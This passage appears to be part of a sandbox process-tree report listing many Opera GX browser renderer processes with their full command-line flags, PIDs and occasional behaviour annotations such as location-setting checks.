C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=7716,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8076 /prefetch:12⤵
- Checks computer location settings
PID:6592
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=8656,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7432 /prefetch:12⤵PID:4220
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=9288,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=9004 /prefetch:12⤵PID:11712
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=5984,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:12⤵PID:6920
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=8972,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8632 /prefetch:12⤵PID:12092
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=9020,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8968 /prefetch:12⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=9332,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8976 /prefetch:12⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=9128,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8992 /prefetch:12⤵PID:7132
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=9436,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8380 /prefetch:12⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=9124,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7576 /prefetch:12⤵PID:7468
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=7200,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7236 /prefetch:12⤵
- Checks computer location settings
PID:12124
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=7172,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:12⤵PID:10276
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=8984,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8620 /prefetch:12⤵PID:8228
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=8424,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:12⤵PID:7536
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=8592,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7808 /prefetch:12⤵PID:8728
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=6884,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8648 /prefetch:12⤵PID:8576
-
-
